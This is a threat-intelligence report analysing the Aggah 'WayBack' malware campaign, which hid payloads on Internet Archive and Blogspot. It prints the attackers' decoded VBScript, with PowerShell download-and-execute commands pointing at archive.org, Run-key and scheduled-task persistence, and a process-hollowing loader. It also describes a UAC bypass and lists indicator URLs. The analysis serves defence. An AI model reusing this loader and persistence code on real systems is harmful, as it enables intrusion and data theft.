Logo
Hamburger Menu Icon
Yoroi Background

The "WayBack” Campaign: a Large Scale Operation Hiding in Plain Sight

Introduction 

Tracking threat actors in the long run is a fundamental part of the cyber threat intelligence program we run at Yoroi, few years ago we began monitoring a particular actor who started offensive operations even in the Italian landscape: Aggah (TH-157), who launched malicious campaign such as the  Roma225 and the RG ones against the Italian manufacturing vertical. At that time, even UNIT42 was closely monitoring that actor, unveiling a large scale operation threatening also United States, Europe and Asia. 

The recent operation we tracked was designed to delivery over 900 pieces of malware with highly dangerous capabilities enabling the threat actor to conduct both digital and environmental monitoring of their victims across the globe. 

The attribution of this operations is far from certainty and such activities could be possibly related to the threat group named Gorgon/Subaat. Anyway, based on the modus operandi, with no doubt this actor is heavily active at least since 2019 and equally certain it is insisting in the European and Italian landscape, so the Yoroi Malware ZLAB is monitoring the evolution of its TTPs to ensure proactive defense to Yoroi customers and recently we intercepted a new offensive operation leveraging new serverless techniques to bypass traditional security defenses to target many European and Italian organizations: we named it the “WayBack campaign”. 

The “WayBack” Campaign 

During our investigation we noticed the attack we were looking at, was just a piece of a wider offensive campaign lasting for months. In fact, the analysis of the infection chain revealed the actor has established the new TTPs at least since April 2021, and many other attach waves were prepared and launched during that time. 

Based on the evidence found during the attacker infrastructure analysis we reconstructed at least six offensive waves part of this campaign:  

  • April 24 
  • May 12 
  • May 19 
  • May 26-28 
  • June 1-3 
  • June 7-10 

We observed an evolution on the techniques of this threat actor, but his strategic choice remains constant in time: a large amount of the malware delivery infrastructure is still serverless. In the last three months Aggah, potentially linked with the APT group Gorgon/Subaat, leveraged other different legit third-party services in a multi-stage fashion (T1608) to bypass security control and gain the initial foothold into the target organizations. Traditionally, the actor was heavily abusing Pastebin services to host and drop malicious code, but in the latest campaign they abuse Internet Archive, the popular nonprofit service created to help the internet community to store pass on the today's open knowledge to our heirs. 

In fact, the actor hosted a huge volume of malicious code inside the “Community Texts” repositories of the Internet Archive project using multiple accounts on the platform, masking their malicious tool as open books and texts. More details on the accounts leveraged by the threat actor (T1583.006) on section “Abused Accounts in the “Wayback” campaign”. 

The “Wayback” Campaign Infection Chain  

To get an immediate outlook of the mechanisms behind the “WayBack” campaign, we prepared an infographic comprehensive of all the capabilities and the extension, in terms of both serverless mechanisms and deployed payloads, of all the entire malicious infrastructure.  

Figure 1: The “Wayback” Campaign attack chain 

Abused Accounts in the “WayBack” campaign 

A necessary deepening point is the malware delivery infrastructure of the “WayBack” campaign. During our inspections we observed that the actor mainly operated through three accounts on the Internet Archive repository. 

  • https:// archive .org/details/@muhammad_tauseef_aslam
  • https:// archive .org/details/@kut404
  • https:// archive .org/details/@Gpt

These accounts have been abused by the threat actors at least since April 2021. 

This image has an empty alt attribute; its file name is image-1024x473.png

Figure 2: Evidence of the malicious account on Web Archive 

Putting the principal malware delivery infrastructure deployment activities in a timeline helps understanding how intense the whole malicious operation has been, in fact the actor was especially active around 1st, 8th and 9th June with peaks in the weaponization phase (TA0042). 

 Account Date Upload URL 
@muhammad_tauseef_aslam 2021-04-24 05:29:04 https:// archive .org/details/25-r_20210424
@muhammad_tauseef_aslam 2021-05-12 05:22:33 https:// archive .org/details/FTp-120-May12   
@muhammad_tauseef_aslam 2021-05-19 11:14:34 https:// archive .org/details/Exe-19-May   
@kut404 2021-05-26 20:56:40 https:// archive .org/details/3_20210528_20210528 
@kut404 2021-05-27 21:35:12 https:// archive .org/details/1_20210527_20210527 
@kut404 2021-05-28 23:28:19 https:// archive .org/details/1_20210527_20210527 
@kut404 2021-06-01 01:14:19 https:// archive .org/details/3_20210601 
@kut404 2021-06-01 01:40:25 https:// archive .org/details/3_20210601_202106 
@kut404 2021-06-01 02:46:36 https:// archive .org/details/3_20210601_20210601 
@kut404 2021-06-02 04:47:57 https:// archive .org/details/3_20210602_20210602 
@muhammad_tauseef_aslam 2021-06-03 05:18:03 https:// archive .org/details/120-Crypted-03-June 
@Gpt 3 2021-06-07 04:09:42 https:// archive .org/details/black3_202106 
@Gpt 3  2021-06-08 16:51:48 https:// archive .org/details/nana3 
@Gpt 3  2021-06-08 18:30:33 https:// archive .org/details/tony3 
@Gpt 3  2021-06-08 19:06:50 https:// archive .org/details/david3_202106 
@Gpt 3  2021-06-08 20:56:11 https:// archive .org/details/divine3 
@Gpt 3  2021-06-08 20:57:58 https:// archive .org/details/divin23 
@muhammad_tauseef_aslam 2021-06-09 03:56:29 https:// archive .org/details/87-Redone-June-9 
@Gpt 3  2021-06-10 10:27:55 https:// archive .org/details/3_20210610_20210610_1027 
@Gpt 3  2021-06-10 10:56:40 https:// archive .org/details/jossy3 
@Gpt 3 2021-06-10 11:01:39 https:// archive .org/details/3_20210610_20210610_1100 

Table 6: Scheme of all the observed campaigns 

Actor Flashcard 

To summarize how this actor is operating we prepared a synthetic flashcard capturing the main techniques observed during the campaign operation. 

Figure 3. Actor flashcard

Technical Analysis 

Hash df91f20f8204e6d0e1239202c58d438143ccc560ac5ae8b2d8cf8e49aaae370 
Threat Aggah campaign May 2021 
Brief Description Malicious PPA macro dropper  
Ssdeep 192:ZMABVcV5JnWrKPfvEdkGsJ9s4cTERRA+o3Mz:PVOWrKPIsrsDEocz 

Table 1: Static information about the sample 

The infection starts with a malicious Powerpoint file weaponized with a malicious macro, as a major part of the multi-stage chains. The macro in this case is easy to decode and it is the following: 

Figure 4:  Malicious Macro evidence 

One thing to notice here is the assignment GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"): it is the CLSID key of WindowsScriptHost COM Object. COM objects have been an interesting area for Security Researchers for some time, especially its usage in penetration testing. Additionally, the MSHTA is a common LOLBIN to execute remote files the actor abuses from long time. 

Dynamic Malware Infrastructure Generation 

During the static inspection of the compiled VBA macro project named “titu.bin”, we noticed that that above mentioned bitly link is not the only one: in fact, there are many bitly links hidden inside: 

Figure 5:  Piece of the list of bitly pages 

All of them are functional and point to a different blogger page. This mechanism is used to update the distribution infrastructure by only changing the redirection URLs. At the time of writing some of them are offline, but most of them are still redirecting to the second layer of the malware distribution infrastructure. 

Figure 6:  List of the blogspot pages 

The bitly urls land on the several blogspot pages. Each of these HTML pages contain an obfuscated Windows Script Host JavaScript code mimicking common javascript codes we can find in every web pages.  

<script language=javascript>document.write(unescape( 
'URL-ESCAPE ENCODED PAYLOAD' 
))</script> 

Code Snippet 1: Pseudocode executed by the MSHTA Engine 

We identifier all the codes hidden in the blogpost pages and through them, we were able to retrieve another large series of dropurls pointing to another layer of the distribution infrastructure. We found not only addresses belonging to the classis Blogspot pages, but also belonging to Web Archive, the famous platform to conserve the historical internet pages.  

Landing into the Internet Archive 

Analyzing the hidden JavaScript code in the blogger pages we recognized the classic obfuscation pattern we saw in past Aggah campaigns: 

Figure 7:  Example of MSHTA code 

After the decoding, we have a cleaner view of the malicious code executed though the MSHTA engine: Aggah downloads many pieces of powershell code from archive.org, the official Internet Archive project domain. 

<HTML> 
<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
<HEAD> 
<script language="VBScript"> 
pink = "pOwersHelL.exe i'E'x(iwr('https://ia601409.us.archive.org/4/items/Re-Panel-24/10.txt') -useB);i'E'x(iwr('https://ia601409.us.archive.org/4/items/Re-Panel-24/10.txt') -useB);i'E'x(iwr('https://ia601409.us.archive.org/4/items/Re-Panel-24/10.txt') -useB);" 
  
Const tpok = &H80000001 
lopaskkk = "." 
Set kasodkmwm = GetObject("winmgmts:\\" & lopaskkk & "\root\default:StdRegProv") 
poloaosd = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" 
akosdwdjdw = "care" 
kasodkmwm.SetStringValue tpok, poloaosd, akosdwdjdw, pink 
set MicrosoftWINdows = GetObject(StrReverse("B0A85DF40C00-9BDA-0D11-0FC1-22CD539F:wen")) 
MicrosoftWINdows _ 
. _ 
RUn _ 
pink,0 
  
  
args = "/create /sc MINUTE /mo 80 /tn """"SECOTAKSA"""" /" & _ 
"F /tr """"\""""M" & "s" & "H" & "t" & "A""""\""""http://1230948%[email protected]/p/10.html\""""" 
  
  
Set Somosa = GetObject("new:13709620-C279-11CE-A49E-444553540000") 
  
Somosa _ 
. _ 
Shellexecute StrReverse("s" "k" "s" "a" "t" "h" "c" "s") _ 
,args _ 
, _ 
"" _ 
, _ 
StrReverse("n" "e" "p" "o") , _ 
0 
  
  
r = StrReverse("s") 
m = StrReverse("M") 
p = StrReverse("H") 
tu = StrReverse("T") 
x = StrReverse("""") 
ha = StrReverse("a") 
culik = StrReverse("""") 
calc = x   m   r   p   tu   ha   culik 
Const halaluya = &H80000001 
magolia = "." 
Set Pologachi = GetObject("winmgmts:\\" & magolia & "\root\default:StdRegProv") 
threefifty = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" 
Magachuchugaga = "task1" 
pathanogalulu = calc   """http://1230948%[email protected]/p/10.html""" 
Pologachi.SetStringValue halaluya, threefifty, Magachuchugaga, pathanogalulu 
'Taskst.3 
Const mamapapa = &H80000001 
papachuchu = "." 
Set sonofbitch = GetObject("winmgmts:\\" & papachuchu & "\root\default:StdRegProv") 
fiftyshadesofgrey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" 
threefivedays = "task2" 
mualollfl = calc   """http://1230948%[email protected]/p/10.html""" 
sonofbitch.SetStringValue mamapapa, fiftyshadesofgrey, threefivedays, mualollfl 
'Taskst.4 
Const polooood = &H80000001 
mamammakdkd = "." 
Set kaosdkqowkdok = GetObject("winmgmts:\\" & mamammakdkd & "\root\default:StdRegProv") 
kdkaskllll = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" 
hotagotamota = "backpup" 
pipatatutupu = calc   """http://1230948%[email protected]/p/10.html""" 
kaosdkqowkdok.SetStringValue polooood, kdkaskllll, hotagotamota, pipatatutupu 
window.resizeTo 0, 0 
self.close 
  
</script> 
</head> 
<body> 
</body> 
</html> 

Code Snippet 2: Decoded script 

The Payload Delivery 

We focused on the Invoke-Expression cmdlet which downloads and execute from the Web Archive Page. The structure of the Powershell script looks like the following: 

[String]$InterserverLogin='PAYLOAD TO INJECT IN HEX FORMAT' 
Function FHGJKLHJKGJFHJGKJHLIHKVJGCJVHBKJ { 
  
    [CmdletBinding()] 
    [OutputType([byte[]])] 
    param( 
        [Parameter(Mandatory=$true)] [String]$H3 
    ) 
    $vbdhjujusyujczz = New-Object -TypeName byte[] -ArgumentList ($H3.Length / 2) 
    for ($i = 0; $i -lt $H3.Length; $i += 2) { 
        $vbdhjujusyujczz[$i / 2] = [Convert]::ToByte($H3.Substring($i, 2), 16) 
    } 
  
    return [byte[]]$vbdhjujusyujczz 
} 
  
  
[String]$yrryyuxvsdsf='PROCESS HOLLOWIG MODULE' 
[Byte[]]$H5=FHGJKLHJKGJFHJGKJHLIHKVJGCJVHBKJ $yrryyuxvsdsf 
[Byte[]]$H6= FHGJKLHJKGJFHJGKJHLIHKVJGCJVHBKJ $InterserverLogin 
[Byte[]]$H5=FHGJKLHJKGJFHJGKJHLIHKVJGCJVHBKJ $yrryyuxvsdsf 
$ali = "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" 
[Reflection.Assembly]::Load($H5).GetType('WpfControlLibrary1.LOGO').GetMethod('bit_alosh').Invoke($null,[object[]] ($ali,$H6))

Code Snippet 3: Payload on the Web Archive page 

Also, this structure remarks the classic TTPs observed during the previous campaign. We have a module for the Process Hollowing technique to inject the final payload inside the designed process. In this case is MSBuild.exe a basic executable of the .NET environment. 

 
This malicious routine is performed through the last line of the PowerShell code: 

“[Reflection.Assembly]::Load($H5).GetType('WpfControlLibrary1.LOGO').GetMethod('bit_alosh').Invoke($null,[object[]] ($ali,$H6))” 

Code Snippet 4: .NET Assembly loading in PowerShell evidence 

Figure 8: Process hollowing malicious DLL evidence 

Dissecting the Payloads 

As we discussed inside the "The Wayback Campaign" section, we observed the threat actor deployed many different payloads on the platform and in most cases, they are each other different, for this reason we decided to explore those malware and study them in order to identify what type of threats it has decided to carry out in its malicious campaigns. Many of them were commodity malware customized by the actor. 

Agent Tesla 

The first sample is the one retrieved from the https://ia601409.us.archive[.]org/4/items/Re-Panel-24/10.txt and after a quick triaging operation, we categorized the sample as Agent Tesla info stealer. 

Hash 8165b1162eb2b4ba988fa313a4c612473b3c8dd20be7d27b6ee81435ed984a7c 
Threat Aggah campaign May 2021 
Brief Description Agent Tesla Payload 
Ssdeep 3072:F+Ew5uDJoIefh/46uKWqu6xHfnIAU/FF75+VD31I/8dzflROzu5F2xr+hxmleYNe:Mn46uKWqu6xVULklI/8xlX5AAhxaNU 

Table 2: Static information about the sample 

The malware does not seems to have an elevated level of obfuscation and it starts with a check of a security privileges, aimed to be an elementary evasion technique because the older machines don’t implement the modern SSL and TLS newest versions. 

Figure 9: Check of security protocols 

After that check, the malware behaves like the classic AgentTesla malware family and continues with its own info stealing operations, retrieving all the sensitive data about the victim machine, browser cache and cookies, Mail clients' credentials, Crypto wallets, Clipboard data etc. It sends all of it to its C2. 

Figure 10: C2 communication evidence  

Agent Tesla FTP 

Hash 5b8643a221d028761328525ec881250fb02840f97792557020a49a226d23e7e6 
Threat Aggah campaign May 2021 
Brief Description Agent Tesla Payload 
Ssdeep 6144:1ey6uKWqu6ac5UkxBM/n3w07dXaTd66VU:1eJ3xW/HdXaTt 

Table 3:  Static Information about the sample  

Even this second wave of malware contains a series of Agent Tesla samples, but they have got a different configuration. The sample performs the same info stealing operations, so we concentrated on the C2 extraction, and this time it is an FTP C2 pointing to another IP. The C2 config is the following. 

Figure 11: C2 FTP protocol evidence 

Oski Stealer 

In this campaign the threat actor changed final payload to deliver, now we have found Oski stealer.   

Hash fcc311967558ab8b02cbda8a6a30b3f2bcb606542da4f7aeb23648daa985035a 
Threat Aggah campaign June 2021 
Brief Description Oski stealer Payload 
Ssdeep 6144:WfUauY68uSWCx+XA7mg2pNG1Ljo3cZEHc39:WwY68u1Cx+wm/pCsv 

Table 4: Static information about the sample 

The sample is compilated in C++ and it does not show any evidence of obfuscation. Moreover, we also noticed the classic string-decoding routine of this malware family. It stores a long series of configuration strings in a base base64 format and encrypted with the RC4 algorithm, like the following way: 

Figure 12: Evidence of decoding routine 

So, we decoded them and reported the configurations strings in the Appendix “Oski/Vidar Configuration strings”. 

Figure 13: Evidence of the C2 configuration 

The Cobian RAT 

During the study of the campaigns, we focused on another peculiar sample, way less common than the previous ones. It is written in .NET framework, and we decided to investigate it. 

Hash 152b770f144ba5c60f8d0958f5eb2a8844e88ae3dc847c1e6c5ee9df96a62f83 
Threat Aggah campaign June 2021 
Brief Description Cobian Payload 
Ssdeep 1536:pXsqEjnYi9bkY6yhLoYtVc9591ocOzUD:pcvbYi9bkEHc39FOI 

Table 5: Static information about the sample 

The sample is packed with the famous .NET Reactor packer, so it is easy to unpack: 

Figure 14: Packer Evidence 

After that, we proceeded to study the malicious code to understand the malware capabilities.  

Figure 15: Evidence of the classic Cobian malware behavior 

By statically analyzing the code, two interesting strings emerge, the classic “HKCU/Software/Microsoft/CurrentVersion/Run” registry key aimed at setting the persistence, and a malformed IP, because the last octet is more than 255. But debugging, the mystery is resolved: the code reverts the string and the actual IP C2 is 193[.56.29.171: 

Figure 16: String Reverse evidence to restore the actual C2 

After preparing the C2's IP to connect, the malware initiates a Socket to it and waits for the receipt of the commands, unfortunately, during the analysis the server was unresponsive, and we weren't able to recover the command list. 

Figure 17: C2 communication routine evidence  

This malware is a Cobian RAT v2.0 sample and by statically inspecting the code, we carried out all the most important command instructed to be executed by that rudimentary backdoor: 

  • Execute commands coming from the C2 
  • List all the active windows  
  • Record the camera 
  • Get Information about the HDD 
  • Take screenshots 
  • Gather sensitive data to send to C2 
  • Modify file permissions 
  • Modify the firewall permissions 

Earlier Cobian RAT versions were analyzed by ZScaler security researchers back in 2017. In their report they documented an interesting fact: that old Cobian RAT sample they investigated was backdoored to retrieve commands from certain Pastebin pages. 

The Persistence components 

After providing an overview of all the malicious payload delivered by all the campaigns, we go back to the inspection of the code seen in "Code Snippet 2" to identify the persistence mechanisms adopted by the threat actor.  

It is quite noisy because it creates four keys inside the classic path, as shown in the following figure: 

Figure 18: Evidence of the set registry keys 

Not only, it creates also a scheduled task repeating every 80 minutes: 

Figure 19: Evidence of the scheduled task 

Those persistence mechanisms are designed to give the actor an important level of resilience and modularity of the entire infrastructure. However, a simple antimalware engine could be able to detect all of them. Besides this consideration, let's analyze all the five persistence components: 

  1. “Backpup” registry key: this registry key points to the “hxxps://papagujjiiiiii[.]blogspot[.]com/p/10.html” blogspot page which, during our investigation was unregistered. 
  1. "care” registry key: this second registry key points to powershell code which unleashes the download of the paylaods described in the previous section. 
  1. "task1” registry key: this registry key points to "hxxps://9ke6n.blogspot[.]com/p/10.html" blogspot page which downloads a complex powershell script aimed at putting to zero the protection systems of the victim machine. It downloads a powershell script from a “usrfiles” platform, a sort of file sharing platform.  

Figure 20: Evidence of the main script on usrfiles platform 

As shown in the figure, it downloads other three components from the same platform: 

1) The first one is the actual malicious script which disables every type of security protection, such as Windows Defender, UAC controls, Firewall, whitelisting some processes (obvious mshta, powershell, cmd, explorer, MsBuild etc), Microsoft Office. 

Figure 21: Piece of the malicious script aimed at putting to zero the security of the victim machine 

2) In order to work, it needs to have the administration privileges which are granted by the usage of the so-called "fodhelper UAC bypass", a well-known documented technique in red-team activities and we encountered in a previous attack chain of the same actor. This technique is guaranteed by the second file on the "usrfiles" platform: 

Figure 22: FodHelper UAC bypass technique evidence 

3) The last file is the simplest, it has to start all the security destruction process: 

Figure 23: Starting routine evidence 

As shown in the first script, all these components will be stored into the folder "C:\Users\Public\" as VBS scripts. 

1) "task2” registry key: During our analysis, the URL pointed by the task has been registered by the actor, but there wasn't any malicious script to execute. Probably the actor will use that URL as backup or in a second moment.  

2) "SECOTAKSA" scheduled task: This task points to "hxxps://0v2x.blogspot[.]com/p/10.html" which downloads the last version of the payload from one of the mentioned Web Archive folders. 

Conclusion 

The malicious campaign we tracked has delivered over 450 distinct malwares to multiple targets all around the world. Most of the malicious code distributed by the Aggah actor is able to seriously violate the confidentiality of digital and voice communications of targeted users due to the impactful nature of the capabilities of the malicious tools: almost all of them can get full remote control and hands on keyboard access to targeted endpoints, some of them are also able to intercept environmental conversations and silently collect video streams directly from the laptop webcam. 

Like in past operations, this enigmatic actor is still leveraging commodity malware to conduct large scale espionage operations, manipulating it to bypass security controls and antiviruses. We also noticed an evolution in the delivery infrastructure related to the abuse of Internet Archive service, a well-known, high reputation, service. Despite this tactical change, many pillars of its delivery operations remain stable such as the usage of PowerPoint presentations, shortening services and script hiding techniques on legit blogging platforms. 

Multi-modular and multi-stage attack chain grant attackers’ high level of resilience and self-customization of the payloads and makes traditional detection and blocking less effective. Yoroi protects its customers from this kind of threat leveraging the Yomi sandbox technologies, Genku network probes and Kanwa endpoint agent, along with precise, human refined Threat Intelligence to protect and respond to modern cyber threats. 

Indicators of Compromise 

Bitly pages:
	bitly[.]com/asdhiasudaisduaiskdhikhasd
	bitly[.]com/asddasjisduaiskdhikhasd
	bitly[.]com/asddassduaiskdhikhasd
	bitly[.]com/asddasduaiskdhikhasd
	bitly[.]com/asddsduaiskdhikhasd
	bitly[.]com/asdsduaiskdhikhasd
	bitly[.]com/assduaiskdhikhasd
	bitly[.]com/asduaiskdhikhasd
	bitly[.]com/sduaiskdhikhasd
	bitly[.]com/duaiskdhikhasd
	bitly[.]com/uaiskdhikhasd
	bitly[.]com/aiskdhikhasd
	bitly[.]com/iskdhikhasd
	bitly[.]com/skdhikhasd
	bitly[.]com/kdhikhasd
	bitly[.]com/akdhikhasd
	bitly[.]com/awkdhikhasd
	bitly[.]com/awikdhikhasd
	bitly[.]com/pdkdhikhasd
	bitly[.]com/awiekdhikhasd
	bitly[.]com/awiewkdhikhasd
	bitly[.]com/awiewakdhikhasd
	bitly[.]com/awiewaskdhikhasd
	bitly[.]com/awiewasqkdhikhasd
	bitly[.]com/awiewasqwkdhikhasd
	bitly[.]com/awiewasqwqkdhikhasd
	bitly[.]com/pkdhikhasd
	bitly[.]com/pdskdhikhasd
	bitly[.]com/pdsskdhikhasd
	bitly[.]com/pdssekdhikhasd
	

Blogspot Pages
	hxxps://l0mx[.]blogspot[.]com/p/1[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/2[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/4[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/8[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/9[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/11[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/12[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/13[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/15[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/18[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/17[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/21[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/22[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/24[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/23[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/44[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/25[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/42[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/26[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/27[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/30[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/31[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/32[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/34[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/37[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/52[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/40[.]html 
	hxxps://l0mx[.]blogspot[.]com/p/54[.]html 
	hxxp://0v2x[.]blogspot[.]com/p/1[.]html
	hxxp://0v2x[.]blogspot[.]com/p/10[.]html
	hxxp://0v2x[.]blogspot[.]com/p/11[.]html
	hxxp://0v2x[.]blogspot[.]com/p/12[.]html
	hxxp://0v2x[.]blogspot[.]com/p/13[.]html
	hxxp://0v2x[.]blogspot[.]com/p/14[.]html
	hxxp://0v2x[.]blogspot[.]com/p/15[.]html
	hxxp://0v2x[.]blogspot[.]com/p/16[.]html
	hxxp://0v2x[.]blogspot[.]com/p/17[.]html
	hxxp://0v2x[.]blogspot[.]com/p/18[.]html
	hxxp://0v2x[.]blogspot[.]com/p/19[.]html
	hxxp://0v2x[.]blogspot[.]com/p/2[.]html
	hxxp://0v2x[.]blogspot[.]com/p/20[.]html
	hxxp://0v2x[.]blogspot[.]com/p/21[.]html
	hxxp://0v2x[.]blogspot[.]com/p/21[.]html
	hxxp://0v2x[.]blogspot[.]com/p/22[.]html
	hxxp://0v2x[.]blogspot[.]com/p/23[.]html
	hxxp://0v2x[.]blogspot[.]com/p/24[.]html
	hxxp://0v2x[.]blogspot[.]com/p/25[.]html
	hxxp://0v2x[.]blogspot[.]com/p/26[.]html
	hxxp://0v2x[.]blogspot[.]com/p/27[.]html
	hxxp://0v2x[.]blogspot[.]com/p/28[.]html
	hxxp://0v2x[.]blogspot[.]com/p/29[.]html
	hxxp://0v2x[.]blogspot[.]com/p/3[.]html
	hxxp://0v2x[.]blogspot[.]com/p/30[.]html
	hxxp://0v2x[.]blogspot[.]com/p/31[.]html
	hxxp://0v2x[.]blogspot[.]com/p/32[.]html
	hxxp://0v2x[.]blogspot[.]com/p/33[.]html
	hxxp://0v2x[.]blogspot[.]com/p/34[.]html
	hxxp://0v2x[.]blogspot[.]com/p/35[.]html
	hxxp://0v2x[.]blogspot[.]com/p/36[.]html
	hxxp://0v2x[.]blogspot[.]com/p/37[.]html
	hxxp://0v2x[.]blogspot[.]com/p/38[.]html
	hxxp://0v2x[.]blogspot[.]com/p/39[.]html
	hxxp://0v2x[.]blogspot[.]com/p/4[.]html
	hxxp://0v2x[.]blogspot[.]com/p/40[.]html
	hxxp://0v2x[.]blogspot[.]com/p/41[.]html
	hxxp://0v2x[.]blogspot[.]com/p/44[.]html
	hxxp://0v2x[.]blogspot[.]com/p/5[.]html
	hxxp://0v2x[.]blogspot[.]com/p/52[.]html
	hxxp://0v2x[.]blogspot[.]com/p/6[.]html
	hxxp://0v2x[.]blogspot[.]com/p/7[.]html
	hxxp://0v2x[.]blogspot[.]com/p/8[.]html
	hxxp://0v2x[.]blogspot[.]com/p/9[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/1[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/10[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/11[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/12[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/13[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/14[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/15[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/16[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/17[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/18[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/19[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/2[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/20[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/21[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/21[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/22[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/23[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/24[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/25[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/26[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/27[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/28[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/29[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/3[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/30[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/31[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/32[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/33[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/34[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/35[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/36[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/37[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/38[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/39[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/4[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/40[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/41[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/44[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/5[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/52[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/6[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/7[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/8[.]html
	hxxp://9ke6n[.]blogspot[.]com/p/9[.]html
	hxxp://kix2k[.]blogspot[.]com/p/1[.]html
	hxxp://kix2k[.]blogspot[.]com/p/10[.]html
	hxxp://kix2k[.]blogspot[.]com/p/11[.]html
	hxxp://kix2k[.]blogspot[.]com/p/12[.]html
	hxxp://kix2k[.]blogspot[.]com/p/13[.]html
	hxxp://kix2k[.]blogspot[.]com/p/14[.]html
	hxxp://kix2k[.]blogspot[.]com/p/15[.]html
	hxxp://kix2k[.]blogspot[.]com/p/16[.]html
	hxxp://kix2k[.]blogspot[.]com/p/17[.]html
	hxxp://kix2k[.]blogspot[.]com/p/18[.]html
	hxxp://kix2k[.]blogspot[.]com/p/19[.]html
	hxxp://kix2k[.]blogspot[.]com/p/2[.]html
	hxxp://kix2k[.]blogspot[.]com/p/20[.]html
	hxxp://kix2k[.]blogspot[.]com/p/21[.]html
	hxxp://kix2k[.]blogspot[.]com/p/21[.]html
	hxxp://kix2k[.]blogspot[.]com/p/22[.]html
	hxxp://kix2k[.]blogspot[.]com/p/23[.]html
	hxxp://kix2k[.]blogspot[.]com/p/24[.]html
	hxxp://kix2k[.]blogspot[.]com/p/25[.]html
	hxxp://kix2k[.]blogspot[.]com/p/26[.]html
	hxxp://kix2k[.]blogspot[.]com/p/27[.]html
	hxxp://kix2k[.]blogspot[.]com/p/28[.]html
	hxxp://kix2k[.]blogspot[.]com/p/29[.]html
	hxxp://kix2k[.]blogspot[.]com/p/3[.]html
	hxxp://kix2k[.]blogspot[.]com/p/30[.]html
	hxxp://kix2k[.]blogspot[.]com/p/31[.]html
	hxxp://kix2k[.]blogspot[.]com/p/32[.]html
	hxxp://kix2k[.]blogspot[.]com/p/33[.]html
	hxxp://kix2k[.]blogspot[.]com/p/34[.]html
	hxxp://kix2k[.]blogspot[.]com/p/35[.]html
	hxxp://kix2k[.]blogspot[.]com/p/36[.]html
	hxxp://kix2k[.]blogspot[.]com/p/37[.]html
	hxxp://kix2k[.]blogspot[.]com/p/38[.]html
	hxxp://kix2k[.]blogspot[.]com/p/39[.]html
	hxxp://kix2k[.]blogspot[.]com/p/4[.]html
	hxxp://kix2k[.]blogspot[.]com/p/40[.]html
	hxxp://kix2k[.]blogspot[.]com/p/41[.]html
	hxxp://kix2k[.]blogspot[.]com/p/44[.]html
	hxxp://kix2k[.]blogspot[.]com/p/5[.]html
	hxxp://kix2k[.]blogspot[.]com/p/52[.]html
	hxxp://kix2k[.]blogspot[.]com/p/6[.]html
	hxxp://kix2k[.]blogspot[.]com/p/7[.]html
	hxxp://kix2k[.]blogspot[.]com/p/8[.]html
